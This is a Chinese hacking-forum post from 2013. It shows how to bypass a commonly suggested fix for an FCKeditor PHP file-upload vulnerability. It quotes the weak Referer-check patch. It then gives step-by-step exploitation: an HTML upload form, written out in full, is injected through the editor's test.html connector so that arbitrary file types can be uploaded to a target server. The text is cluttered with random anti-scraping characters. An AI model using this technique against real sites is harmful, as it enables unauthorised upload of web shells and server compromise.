找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2235|回复: 0
打印 上一主题 下一主题

fckeditor 漏洞修复后的二次利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:12:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php
, Q; P; X: ?& ^+ g* o5 V4 C网上给出的修复方案是9 k1 p8 G9 E* y$ H
修复方法,删除FCK编辑器用其他的编辑器
. t7 J8 W0 p5 p; G或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件
9 n: O  ^/ M4 m/ ^" j" {* u* h" |. z
% i( Y5 m6 r0 x1 L- L% ^- ~4 Frequire(‘config.php’);6 J1 X4 l6 h3 P% s
require(‘util.php’);2 ]: g# v  C0 r
的下面添加以下代码—————————–
( _8 D' d5 S3 n! Z8 x& I//防止外部提交% g4 |* `) L' x9 g: n
function outsidepost(); ]' t  W* L1 ?9 d
{
) ~6 J. |  C! F, h( ]/ x/ h) d4 f$servername=$_SERVER['SERVER_NAME'];
4 s: [' h. i9 \2 B6 g$sub_from=@$_SERVER['HTTP_REFERER'];, }% ^! S3 G# j) O
$sub_len=strlen($servername);4 Q1 E* x8 k! q8 X7 r
$checkfrom=substr($sub_from,7,$sub_len);
$ q2 }; w- O6 @8 I' W5 V3 T. qif($checkfrom!=$servername){
$ i! F; I+ @1 q3 c1 W3 g1 mecho(“you don’t outsidepost!”);
7 b" w; |* A+ R! P( ~exit;
: q+ F( M; s" t% R2 {3 E2 t}1 o% @( h) |3 d# S; z& i' [6 o
}! T: V6 c6 O0 V4 k  n' y! _6 C/ V
outsidepost();2 L& K* Z# C$ F  B
防止外部提交,但是没有防止内部提交," z! q# h+ n% M
利用方法:
, s4 r1 `0 N1 @( \: ?8 l$ L/ e& |. W1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html. j# Q; H$ d7 P$ h& g
2,在Current Folder 框输入
" R9 c/ t  i) I; W/ F<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
. I; S' }) Q6 @- Q然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。
  q6 q9 v8 z8 ?, d( ~4 }PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表